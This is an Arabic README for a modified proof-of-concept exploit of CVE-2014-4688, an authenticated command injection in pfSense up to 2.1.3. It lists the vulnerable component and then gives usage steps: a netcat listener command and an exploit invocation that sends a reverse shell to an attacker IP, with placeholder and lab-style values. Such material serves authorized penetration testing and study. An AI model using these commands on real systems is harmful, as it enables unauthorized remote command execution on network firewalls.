
استغلال إثبات المفهوم معدل لـ CVE-2014-4688، ثغرة حقن أوامر في pfSense status_rrd_graph_img.php، مما يتيح تنفيذ التعليمات البرمجية عن بُعد مع مصادقة ومعالجة SSL.
مفهوم إثبات معدل من Exploit-DB لـ CVE-2014-4688 (حقن أوامر في pfSense status_rrd_graph_img.php)
يحتوي هذا المستودع على نسخة معدلة من مفهوم الإثبات الأصلي من Exploit-DB لـ CVE-2014-4688، الذي يؤثر على إصدارات pfSense ≤ 2.1.3.
توجد الثغرة داخل مكون status_rrd_graph_img.php وتسمح للمستخدمين الموثقين بتنفيذ أوامر نظام عشوائية بسبب عدم تنقية المدخلات بشكل صحيح للمعامل database.
| CVE: | CVE-2014-4688 |
| الإصدارات المتأثرة: | pfSense ≤ 2.1.3 |
| المكون: | status_rrd_graph_img.php |
| التأثير: | تنفيذ أوامر موثق |
يمكن للمستخدم الموثق حقن أوامر شيل عشوائية عبر مدخلات مصممة يتم إرسالها إلى نقطة النهاية الضعيفة.
ابدأ مستمعاً:
nc -lvnp <LPORT>
مفهوم الإثبات:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
يتم توفير هذا المستودع لأغراض البحث الأمني المصرح به والتعليم والاختبار الخاضع للتحكم فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني وغير أخلاقي.